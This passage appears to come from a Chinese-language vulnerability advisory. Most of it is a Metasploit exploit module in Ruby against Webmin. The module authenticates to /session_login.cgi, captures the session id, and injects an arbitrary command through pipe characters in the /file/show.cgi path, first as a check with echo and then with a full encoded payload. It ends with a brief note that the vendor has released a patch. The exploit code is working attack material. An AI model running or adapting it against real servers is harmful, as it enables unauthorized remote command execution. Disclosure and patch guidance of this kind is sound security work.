res = send_request_cgi(
            {
                'method'  => 'POST',
                'uri'     => "/session_login.cgi",
                'cookie'  => "testing=1",
                'data'    => data
            }, 25)
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
            print_good "#{peer} - Authentication successful"
            session = res.headers['Set-Cookie'].split("sid=")[1].split(";")[0]
        else
            print_error "#{peer} - Authentication failed"
            return Exploit::CheckCode::Unknown
        end
print_status("#{peer} - Attempting to execute...")
command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"
res = send_request_cgi(
            {
                'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
                'cookie'  => "sid=#{session}"
            }, 25)
        if res and res.code == 200 and res.message =~ /Document follows/
            return Exploit::CheckCode::Appears
        else
            return Exploit::CheckCode::Safe
        end
end
def exploit
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Attempting to login...")
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
            {
                'method'  => 'POST',
                'uri'     => "/session_login.cgi",
                'cookie'  => "testing=1",
                'data'    => data
            }, 25)
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /sid/
            session = res.headers['Set-Cookie'].scan(/sid\=(\w+)\;*/).flatten[0] || ''
            if session and not session.empty?
                print_good "#{peer} - Authentication successfully"
            else
                print_error "#{peer} - Authentication failed"
                return
            end
            print_good "#{peer} - Authentication successfully"
        else
            print_error "#{peer} - Authentication failed"
            return
        end
print_status("#{peer} - Attempting to execute the payload...")
command = payload.encoded
res = send_request_cgi(
            {
                'uri'     => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",
                'cookie'  => "sid=#{session}"
            }, 25)
        if res and res.code == 200 and res.message =~ /Document follows/
            print_good "#{peer} - Payload executed successfully"
        else
            print_error "#{peer} - Error executing the payload"
            return
        end
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
Webmin
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
